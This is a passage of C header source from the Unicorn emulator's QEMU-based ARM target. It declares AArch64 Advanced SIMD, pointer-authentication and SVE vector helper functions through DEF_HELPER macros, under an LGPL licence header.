DEF_HELPER_3(advsimd_add2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_sub2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_mul2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_div2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_max2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_min2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_maxnum2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_minnum2h, i32, i32, i32, ptr) DEF_HELPER_3(advsimd_mulx2h, i32, i32, i32, ptr) DEF_HELPER_4(advsimd_muladd2h, i32, i32, i32, i32, ptr) DEF_HELPER_2(advsimd_rinth_exact, f16, f16, ptr) DEF_HELPER_2(advsimd_rinth, f16, f16, ptr) DEF_HELPER_2(advsimd_f16tosinth, i32, f16, ptr) DEF_HELPER_2(advsimd_f16touinth, i32, f16, ptr) DEF_HELPER_2(sqrt_f16, f16, f16, ptr) DEF_HELPER_2(exception_return, void, env, i64) DEF_HELPER_FLAGS_2(dc_zva, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_3(pacia, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacib, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacda, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(pacga, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autia, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autib, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autda, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(autdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(xpaci, TCG_CALL_NO_RWG_SE, i64, env, i64) DEF_HELPER_FLAGS_2(xpacd, TCG_CALL_NO_RWG_SE, i64, env, i64)

unicorn-2.1.1/qemu/target/arm/helper-sve.h

/* * AArch64 SVE specific helper definitions * * Copyright (c) 2018 Linaro, Ltd * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ DEF_HELPER_FLAGS_2(sve_predtest1, TCG_CALL_NO_WG, i32, i64, i64) DEF_HELPER_FLAGS_3(sve_predtest, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_pfirst, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_pnext, TCG_CALL_NO_WG, i32, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_and_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_eor_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_orr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_bic_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_add_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sub_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smax_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umax_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smin_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umin_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) 
DEF_HELPER_FLAGS_5(sve_umin_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sabd_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_uabd_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_mul_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_smulh_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_umulh_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sdiv_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sdiv_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_udiv_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_udiv_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_sel_zpzz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_h, 
TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_asr_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsr_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(sve_lsl_zpzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_orv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_eorv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_andv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_saddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uaddv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_smaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_umaxv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_sminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_b, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_h, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_s, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_uminv_d, TCG_CALL_NO_RWG, i64, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_b, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_h, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_s, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(sve_clr_d, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_movz_d, 
TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zpzi_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asrd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_clz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnt_zpz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_cnot_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fabs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_fneg_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_not_zpz_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_s, 
TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtb_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxth_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxth_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxth_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxth_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_sxtw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_uxtw_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_abs_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_neg_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mla_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(sve_mls_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_index_b, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_h, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_s, TCG_CALL_NO_RWG, void, ptr, i32, i32, i32) DEF_HELPER_FLAGS_4(sve_index_d, TCG_CALL_NO_RWG, void, ptr, i64, i64, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_asr_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsr_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_lsl_zzw_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_p32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_p64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(sve_adr_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) 